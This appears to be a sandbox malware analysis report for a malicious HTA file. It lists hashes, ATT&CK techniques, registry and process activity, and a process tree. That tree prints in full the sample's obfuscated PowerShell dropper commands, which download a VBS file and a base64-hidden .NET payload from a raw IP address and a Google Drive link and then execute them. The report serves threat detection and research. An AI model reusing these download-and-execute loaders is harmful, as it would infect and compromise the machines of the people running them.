3b5f33baf9dbcbe033909735e6238ecf8c3f5aaf915d7298157fb07e034cf2bb

General

Target

seethegoodthingswhicgivenyoubest.hta
Size

206KB
MD5

ee06f92a6abcd0b214c3251740547dbe
SHA1

6c36d8fa208e1c6f97272ab9f14b4e6b1ff17f3b
SHA256

3b5f33baf9dbcbe033909735e6238ecf8c3f5aaf915d7298157fb07e034cf2bb
SHA512

8d198174ebef3ad98944261cff5eafa079557ca5fda0bfdd340d193eba49e306707f331586bf321ebdb401d40df645de0f411dd1d6592854c3730f3fdf54088b
SSDEEP

48:4FhWsTR/F7gNqXfgaEJK4RJcB458p2ybuzkyq88oCxL/RNOeugGr4BJSFJkvhNcm:43F97/E1RXqfbutqSCxL/Rgeb4Frh/Q

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

powErshEll.eXepowershell.exe

flow pid process

3 2808 powErshEll.eXe
6 1248 powershell.exe
8 1248 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2632 powershell.exe
1248 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

powErshEll.eXepowershell.exe

pid process

2808 powErshEll.eXe
2596 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
6 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
3	2808	powErshEll.eXe
6	1248	powershell.exe
8	1248	powershell.exe

pid	process
2632	powershell.exe
1248	powershell.exe

pid	process
2808	powErshEll.eXe
2596	powershell.exe

flow	ioc
5	drive.google.com
6	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

csc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exepowErshEll.eXepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powErshEll.eXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powErshEll.eXepowershell.exepowershell.exepowershell.exe

pid process

2808 powErshEll.eXe
2596 powershell.exe
2808 powErshEll.eXe
2808 powErshEll.eXe
2632 powershell.exe
1248 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2808	powErshEll.eXe
2596	powershell.exe
2808	powErshEll.eXe
2808	powErshEll.eXe
2632	powershell.exe
1248	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powErshEll.eXepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2808	powErshEll.eXe
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	1248	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exepowErshEll.eXecsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2672 wrote to memory of 2808	2672	mshta.exe	powErshEll.eXe
PID 2672 wrote to memory of 2808	2672	mshta.exe	powErshEll.eXe
PID 2672 wrote to memory of 2808	2672	mshta.exe	powErshEll.eXe
PID 2672 wrote to memory of 2808	2672	mshta.exe	powErshEll.eXe
PID 2808 wrote to memory of 2596	2808	powErshEll.eXe	powershell.exe
PID 2808 wrote to memory of 2596	2808	powErshEll.eXe	powershell.exe
PID 2808 wrote to memory of 2596	2808	powErshEll.eXe	powershell.exe
PID 2808 wrote to memory of 2596	2808	powErshEll.eXe	powershell.exe
PID 2808 wrote to memory of 2684	2808	powErshEll.eXe	csc.exe
PID 2808 wrote to memory of 2684	2808	powErshEll.eXe	csc.exe
PID 2808 wrote to memory of 2684	2808	powErshEll.eXe	csc.exe
PID 2808 wrote to memory of 2684	2808	powErshEll.eXe	csc.exe
PID 2684 wrote to memory of 2364	2684	csc.exe	cvtres.exe
PID 2684 wrote to memory of 2364	2684	csc.exe	cvtres.exe
PID 2684 wrote to memory of 2364	2684	csc.exe	cvtres.exe
PID 2684 wrote to memory of 2364	2684	csc.exe	cvtres.exe
PID 2808 wrote to memory of 2292	2808	powErshEll.eXe	WScript.exe
PID 2808 wrote to memory of 2292	2808	powErshEll.eXe	WScript.exe
PID 2808 wrote to memory of 2292	2808	powErshEll.eXe	WScript.exe
PID 2808 wrote to memory of 2292	2808	powErshEll.eXe	WScript.exe
PID 2292 wrote to memory of 2632	2292	WScript.exe	powershell.exe
PID 2292 wrote to memory of 2632	2292	WScript.exe	powershell.exe
PID 2292 wrote to memory of 2632	2292	WScript.exe	powershell.exe
PID 2292 wrote to memory of 2632	2292	WScript.exe	powershell.exe
PID 2632 wrote to memory of 1248	2632	powershell.exe	powershell.exe
PID 2632 wrote to memory of 1248	2632	powershell.exe	powershell.exe
PID 2632 wrote to memory of 1248	2632	powershell.exe	powershell.exe
PID 2632 wrote to memory of 1248	2632	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethegoodthingswhicgivenyoubest.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2672
- C:\Windows\SysWOW64\winDOWspOweRsheLl\V1.0\powErshEll.eXe
  "C:\Windows\sySTEm32\winDOWspOweRsheLl\V1.0\powErshEll.eXe" "POweRsHeLl -eX ByPaSs -NOP -W 1 -C DevIceCredeNTiaLdepLOyMenT ; ieX($(Iex('[syStem.TExT.encodiNG]'+[ChAr]58+[chAr]0x3A+'Utf8.geTsTRing([sYsTem.CoNVErT]'+[ChAr]0x3A+[CHAr]0x3A+'FROmBaSe64StriNG('+[cHaR]0X22+'JFZ3SjZCMXZ5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlUmRlRklOaVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhZTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrck9jVWhmcU1VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlaW1PUVplQ1NpWixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2VCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlVwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuZ0tHbVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFZ3SjZCMXZ5OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjUyLzEyMC9waWN0dXJld2l0aG1lYmFja3dpdGhuZXd0aGluZ3NncmVhdGZvcm1lLnRJRiIsIiRFblY6QVBQREFUQVxwaWN0dXJld2l0aG1lYmFja3dpdGhuZXd0aGluZ3NncmVhdGZvcm1lLnZicyIsMCwwKTtzdEFyVC1TTGVFcCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhtZWJhY2t3aXRobmV3dGhpbmdzZ3JlYXRmb3JtZS52YnMi'+[CHar]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2808
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPaSs -NOP -W 1 -C DevIceCredeNTiaLdepLOyMenT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2596
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ud_8cjki.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2684
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1028.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1027.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2364
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithmebackwithnewthingsgreatforme.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2292
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlbnY6Y09Nc3BFY1s0LDI0LDI1XS1Kb0lOJycpKCAoJzU2dWltYWdlVXJsID0gdklPaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xVXlIcXdyblhDbEtCSjNqJysnNjNMbDF0MlN0VmdHeGJTdDAgdklPOzU2dXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7NTZ1aScrJ21hZ2VCeXRlcyA9IDU2dXdlYkNsaWVudC5Eb3dubG9hZERhdGEoNTZ1aW1hZ2VVcmwpOzU2dWltYWdlVGV4dCA9ICcrJ1tTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDU2dWltYWdlQnknKyd0ZXMpOzU2dXN0YXJ0RmxhZyA9IHZJTzw8QkFTRTY0X1NUQVJUPj52SU8nKyc7NTZ1ZW5kRmxhZyA9IHZJTzw8QkFTRTY0X0VORD4+dklPOzU2dXN0YXJ0SW5kZXggPSA1NnVpbWFnZVRleHQuSW5kZXhPZig1NnVzdGFydEZsYWcpOzU2dWVuZEluZGV4ID0gNTZ1aW1hZ2VUZXh0LkluZGV4T2YoNTZ1ZW5kRmxhZyk7NTZ1c3RhcnRJbmRleCAtZ2UgMCAtYW5kIDU2dWVuZCcrJ0luZGV4IC1ndCA1NnVzdGFydEluZGV4OzU2dXN0YXJ0SW5kZXggKz0gNTZ1c3RhcnRGbGFnLkxlbmd0aDs1NnViYXNlNjRMZW5ndGggPSA1NnVlbmRJbmQnKydleCAtIDU2dXN0YXJ0SW5kZXg7NTZ1YmFzZTY0Q29tbWFuZCA9IDU2dWltYWdlVGV4dC5TdWJzdHJpbmcoNTYnKyd1c3RhcnRJbmRleCwgNTZ1YmFzZTY0TGVuZ3RoKTs1NnViYXNlNjRSZXZlcnNlZCA9IC1qJysnb2luJysnICg1NnViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgNmlrIEZvckVhY2gtT2JqZWN0IHsgNTZ1XyB9KVstMS4uLSg1NicrJ3ViYXNlNicrJzRDb21tYW5kLkxlbmd0aCldOzU2dWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoNTZ1YmFzZTY0UmV2ZXJzZWQpOzU2dWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCg1NnVjb21tYW5kQnl0ZXMpOzU2dXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QodklPVkEnKydJJysndklPKTs1NnV2YWlNZXRob2QuSW52b2tlKDU2dW51bGwsIEAodklPdCcrJ3h0LktMR0xMLzAyMS8yNS43Ljg2MS40JysnMDEvLzpwdHRodklPLCAnKyd2SU9kZXNhdGl2YWRvdicrJ0lPLCB2SU9kZXNhdGl2YWRvdklPLCB2SU9kZXNhdGl2YWRvdklPLCB2SU9hc3BuZXRfY29tcCcrJ2lsZXJ2SU8sIHZJT2Rlc2F0aXZhZG92SU8sICcrJ3ZJT2Rlc2F0aXZhZG92SU8sdklPZGVzYXRpdmFkb3ZJTyx2SU9kZXNhdGl2YWRvdklPLHZJT2RlcycrJ2F0aXZhZG92SU8sdklPZGVzYXRpdmFkb3ZJTyx2SU9kZXNhdGl2YWRvdklPLHZJTzF2SU8sdklPZGVzYXRpdmFkJysnb3ZJTykpOycpLnJlcExhQ0UoKFtjaEFSXTU0K1tjaEFSXTEwNStbY2hBUl0xMDcpLFtzVFJpbmddW2NoQVJdMTI0KS5yZXBMYUNFKCd2SU8nLFtzVFJpbmddW2NoQVJdMzkpLnJlcExhQ0UoJzU2dScsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2632
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $env:cOMspEc[4,24,25]-JoIN'')( ('56uimageUrl = vIOhttps://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j'+'63Ll1t2StVgGxbSt0 vIO;56uwebClient = New-Object Sy'+'stem.Net.WebClient;56ui'+'mageBytes = 56uwebClient.DownloadData(56uimageUrl);56uimageText = '+'[System.Text.Encoding]::UTF8.GetString(56uimageBy'+'tes);56ustartFlag = vIO<<BASE64_START>>vIO'+';56uendFlag = vIO<<BASE64_END>>vIO;56ustartIndex = 56uimageText.IndexOf(56ustartFlag);56uendIndex = 56uimageText.IndexOf(56uendFlag);56ustartIndex -ge 0 -and 56uend'+'Index -gt 56ustartIndex;56ustartIndex += 56ustartFlag.Length;56ubase64Length = 56uendInd'+'ex - 56ustartIndex;56ubase64Command = 56uimageText.Substring(56'+'ustartIndex, 56ubase64Length);56ubase64Reversed = -j'+'oin'+' (56ubase64Command.ToCharArray() 6ik ForEach-Object { 56u_ })[-1..-(56'+'ubase6'+'4Command.Length)];56ucommandBytes = [System.Convert]::FromBase64String(56ubase64Reversed);56uloadedAssembly = [Syste'+'m.Reflection.Assembly]::'+'Load(56ucommandBytes);56uvaiMethod = [dnlib.IO.Home].GetMethod(vIOVA'+'I'+'vIO);56uvaiMethod.Invoke(56unull, @(vIOt'+'xt.KLGLL/021/25.7.861.4'+'01//:ptthvIO, '+'vIOdesativadov'+'IO, vIOdesativadovIO, vIOdesativadovIO, vIOaspnet_comp'+'ilervIO, vIOdesativadovIO, '+'vIOdesativadovIO,vIOdesativadovIO,vIOdesativadovIO,vIOdes'+'ativadovIO,vIOdesativadovIO,vIOdesativadovIO,vIO1vIO,vIOdesativad'+'ovIO));').repLaCE(([chAR]54+[chAR]105+[chAR]107),[sTRing][chAR]124).repLaCE('vIO',[sTRing][chAR]39).repLaCE('56u','$'))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1248

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES1028.tmp

Filesize
1KB

MD5
2c49e83edd1bcc2b6d99beefbd1a3cc6

SHA1
76b099617d979156c4b90bdfb10e7ae0c601a3f6

SHA256
de574ccc07b5465f7b40b6c6230494ab12c688e2a7960686abb4a45fab2fd70e

SHA512
4e1478c6d5ae0ab275f8abf40417885329578105feb4b10c44a59d1cbad4f91b32750398040eb3104a3ab304d5e5ea884ce4002f19f423dac3e4bb367f1609a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ud_8cjki.dll

Filesize
3KB

MD5
cc242bf8466002679bd7e26468e1a9ea

SHA1
67b50e3372eaa30e29023cc75eacc630173f5f9c

SHA256
648f48aa9e7131848106ecedbd43f1aa225352c493e2e12c27f94e3188c52c34

SHA512
63abeab2c1e5fc981df10406a1872b8d2a8902b928d50e74f22440d29546c607937c5c00eef5abf1219f527413fc444dd26b9551005afda73909c729c1aa688d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ud_8cjki.pdb

Filesize
7KB

MD5
ede14d1bf61be1aa9520f811a41cae05

SHA1
295ea5efec871bfde467a709afdb085d402ad09d

SHA256
2e8171842a564b2d8656250bd8a96573e9fbc254c762d0ea1af4cd9a82f1d8e9

SHA512
742bbd912617b3f4580de23cac15945625856b95f6d637ae37c99dfc055463f7501578b52eb3db01b924939e5048b49f8348f9bfe180c29ded70f3752c31e09f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
17481dbc2af7e84ca39a711d6973b8a1

SHA1
0fc39abfb0576ff17505d00a5d18ad4b38e96be0

SHA256
b161496634fa4a654326829c26e8e90c7adcd1eba6e7b01340bd8241df975ea6

SHA512
ca98e2ecdc75fc8a0995d0c72ea8037dec05b9916ecf07248772e0851be1c344d6b0f2732fbcd6fcb1e814779f7a3edb16d23ddc1d7fa0b3ea79e96518356161

Download Submit
C:\Users\Admin\AppData\Roaming\picturewithmebackwithnewthingsgreatforme.vbs

Filesize
138KB

MD5
6ee290a97ed7f5bcf1d264fcb5e1e4f7

SHA1
0851b61aa41328bac3ed7160eba1151a6faf2f0b

SHA256
b0d216e063b15e640ee73f15277cbd58b8d2a38ee96f61a8ad1e1bc36e400b88

SHA512
5aff6b07f5d77f548ece9bd2609177f0a742123ffd2f1861f0008dfb0f51d137a15a4c9436fc48c64b40c733bb550eb894e3a5bff3855b533262a06390b4034e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC1027.tmp

Filesize
652B

MD5
3914507c7db9d61112e29cfb879d4c16

SHA1
348bbe204328d9cff7d28bac7e6d183d3ff81193

SHA256
d4c44936803360447296522e3ebc777481c1ef9e4a587334e69f3962ef1c0452

SHA512
8ad07873c535d80069c0dc36ace9a678b61d11bb57b7b0df22d97c278bdca7c3c861537d1cfb0171ffa25e6a33b3b155e82d666ac66ba9ebb5f2d26c30c47adb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ud_8cjki.0.cs

Filesize
473B

MD5
205f375dc3c53a766f92ffdea3687dde

SHA1
4d6aeadd2f24e149e06b17ecff040e835c78efa1

SHA256
25267d3b40367bbddf882619d418415a2c49bd26d964b6e2d5e214d92a8f87ab

SHA512
7708b1b37f3e2e156762f2704f4b70bf9c92473e1f8874ffc52e8f020a519a14f610b6e855059fa8dda425708e95a65ef8e925bf8ac998bb703b6770b7d2692f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ud_8cjki.cmdline

Filesize
309B

MD5
35644586ad499f931c802bfc7464f369

SHA1
274f99542ac9ecc53fc7ad7f8c6deca3d34f723e

SHA256
432e84d8eb7d04801eb8fcff462cdfdebe49d64869f93dfa42d4b0381afa38d5

SHA512
c5ad82241f68438247b9d215609bc66cdac7f09eee9731ee67f5fe9db0ea3f94fc425261744cca3dec0bf5441e5d1de241812a94be77da23276042f45087f599

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads